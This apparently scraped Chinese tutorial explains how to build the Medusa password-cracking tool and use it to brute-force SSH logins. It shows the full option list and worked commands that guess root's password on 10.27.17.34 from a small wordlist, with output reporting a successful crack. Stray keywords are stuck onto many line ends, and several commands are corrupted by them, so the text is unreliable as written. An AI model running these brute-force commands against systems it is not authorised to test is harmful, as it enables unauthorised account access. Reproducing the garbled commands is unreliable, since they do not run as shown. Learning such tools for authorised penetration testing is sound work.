使用Medusa美杜莎暴力破解SSH密碼html
一、Medusa簡介mysql
Medusa(美杜莎)是一個速度快,支持大規模並行,模塊化的爆力破解工具。能夠同時對多個主機,用戶或密碼執行強力測試。Medusa和hydra同樣,一樣屬於在線密碼破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表單的密碼爆破工具。web
官方網站:http://foofus.net/goons/jmk/medusa/medusa.html。sql
二、安裝medusa ,手動編譯和安裝medusavim
[root@k5 ~]# yum install libssh2-devel libssh2-devel -y服務器
[root@k5 ~]# tar zxvf 2.2.tar.gzapp
[root@k5 ~]# cd medusa-2.2/ssh
[root@k5 medusa-2.2]# ./configure --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes模塊化
#這個參數中加入不少模塊,這樣方便後期使用。--enable-module-ssh=yes這個就是稍後要使用的暴力破解sshd服務的模塊。svn
[root@k5 medusa-2.2]#make -j 4
[root@k5 medusa-2.2]# make install #安裝完成後,會將medusa的一些modules 文件複製到/usr/local/lib/medusa/modules文件夾。
[root@k5 ~]# ls /usr/local/lib/medusa/modules #查看已經生成的模塊
三、Medusa參數說明
Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT] 目標主機名稱或者IP地址
-H [FILE] 包含目標主機名稱或者IP地址文件
-u [TEXT] 測試的用戶名
-U [FILE] 包含測試的用戶名文件
-p [TEXT] 測試的密碼
-P [FILE] 包含測試的密碼文件
-C [FILE] 組合條目文件
-O [FILE] 日誌信息文件
-e [n/s/ns] n表明空密碼,s表明爲密碼與用戶名相同
-M [TEXT] 模塊執行名稱
-m [TEXT] 傳遞參數到模塊
-d 顯示全部的模塊名稱
-n [NUM] 使用非默認Tcp端口
-s 啓用SSL
-r [NUM] 重試間隔時間,默認爲3秒
-t [NUM] 設定線程數量
-T 同時測試的主機總數
-L 並行化,每一個用戶使用一個線程
-f 在任何主機上找到第一個帳號/密碼後,中止破解
-F 在任何主機上找到第一個有效的用戶名/密碼後中止審計。
-q 顯示模塊的使用信息
-v [NUM] 詳細級別(0-6)
-w [NUM] 錯誤調試級別(0-10)
-V 顯示版本
-Z [TEXT] 繼續掃描上一次
四、破解單一服務器SSH密碼
例1:經過文件來指定host和user,host.txt爲目標主機名稱或者IP地址,user.txt指定須要暴力破解的用戶名,密碼指定爲123456。
[root@k5 medusa-2.2]# cd
[root@k5 ~]# echo 10.27.17.34 > /root/host.txt
[root@k5 ~]# echo root > /root/users.txt
[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -p 123456
注:能夠看到暴解成功。
例2:對單一服務器進行密碼字典暴力破解
[root@k5 ~]# vim /root/p.txt #寫入如下內容,每行一個密碼,作一個臨時字典 。
123
abc123
123456
666666
注:其中123456 是咱們的密碼
[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt
例3:加-O ssh.log 能夠將成功破解的記錄記錄到ssh.log文件中
[root@k5 medusa-2.2]# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log
ACCOUNT CHECK: [ssh] Host: 10.27.17.34 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (2 of 861 complete)
ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]
[root@k5 ~]# cat ssh.log
# Medusa has finished (2019-09-19 11:13:37).# Medusa v.2.2 (2019-09-19 11:15:16)# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log # Medusa v.2.2 (2019-09-19 11:26:37)# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]# Medusa has finished (2019-09-19 11:26:40).